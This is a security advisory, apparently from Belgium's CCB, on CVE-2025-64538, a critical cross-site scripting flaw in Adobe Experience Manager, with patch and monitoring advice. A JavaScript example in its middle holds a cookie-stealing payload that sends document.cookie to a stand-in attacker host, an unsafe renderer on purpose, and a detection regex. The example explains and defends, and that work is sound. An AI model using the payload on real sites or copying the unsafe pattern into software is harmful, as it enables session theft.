Warning: Critical Cross-Site Scripting (XSS) in Adobe Experience Manager (AEM), Patch Immediately!

Published: 12/12/2025
  • Last update: 12/12/2025
  • Affected software: Adobe Experience Manager (AEM) versions up to and including 6.5.23 (fixed in 6.5.24)
  • Type: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
  • CVE/CVSS
    → CVE-2025-64538: CVSS 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

Sources

Adobe - <https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html>

Risks

Adobe Experience Manager (AEM) is part of the Adobe Experience Cloud. It is an integrated content management system (CMS) and digital asset management (DAM) that helps businesses create, manage, and deliver websites, apps, and forms in multiple channels.

CVE-2025-64538 is a vulnerability in Adobe Experience Manager that, if exploited, allows a remote attacker to inject malicious script into web pages served by AEM. That script runs in the victim's browser in the context of the affected site, where it can read or act on whatever the victim's session has access to.

As of the time of writing this advisory (2025-12-11), there is no public proof-of-concept or proof of exploitation.

If an attacker exploits this vulnerability, the impact on the confidentiality and integrity of the affected system is high; per the CVSS vector (A:N), availability is not affected.

Description

A network-based attacker without any privileges or prior authentication can exploit CVE-2025-64538 to perform cross-site scripting (XSS): arbitrary script of the attacker's choosing is executed in the victim's browser, which can be used to hijack the victim's session.

Exploitation requires user interaction (UI:R), for example the victim opening a crafted link. Once the script runs, the attacker can perform actions with the compromised user's permissions; if that user holds administrative rights in AEM, this can lead to compromise of the AEM instance.
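To make the mechanism described above concrete, the following is an added example (not Adobe's code and not the vulnerable AEM component, whose details the advisory does not publish) of a generic CWE-79 flaw: an untrusted request parameter is written straight into HTML, a constructed payload of the kind an attacker would place in a crafted link runs in the victim's browser, and context-aware escaping neutralises it. The function and attacker-host names are assumptions for illustration.

```javascript
// Added example of CWE-79, not code from the original advisory or from AEM.

// Constructed payload: what an attacker might embed in a link the victim is
// lured into opening. It exfiltrates the page's cookies to an attacker host
// (hypothetical name) via an image error handler, so no <script> tag is needed.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable rendering: the untrusted value is concatenated into the HTML
// text context with no encoding, so the browser parses the payload as markup.
function renderSearchUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened rendering: encode the characters that are significant to the HTML
// parser before emitting the value. This is the right encoding for an HTML
// text or attribute-value context; JavaScript or URL contexts need their own.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Crude tester's check over rendered output: is there still an element that
// carries an inline on* event handler, or a <script> tag? Use it to compare
// the two renderings of the same payload; it is not a general XSS detector.
function containsActiveMarkup(html) {
  return /<\s*[a-z]+[^>]*\son\w+\s*=/i.test(html) || /<\s*script\b/i.test(html);
}

console.log('unsafe :', renderSearchUnsafe(PAYLOAD));
console.log('safe   :', renderSearchSafe(PAYLOAD));
console.log('active markup in unsafe output:', containsActiveMarkup(renderSearchUnsafe(PAYLOAD)));
console.log('active markup in safe output  :', containsActiveMarkup(renderSearchSafe(PAYLOAD)));
```

Marking the session cookie HttpOnly stops the `document.cookie` read in this particular payload, but it does not stop the injected script from issuing authenticated requests to the site on the victim's behalf, which is why patching, not cookie flags, is the remediation.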

Recommended Actions

Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.

Please upgrade to version 6.5.24 or later.

Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.

In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.

References

NVD - https://nvd.nist.gov/vuln/detail/CVE-2025-64538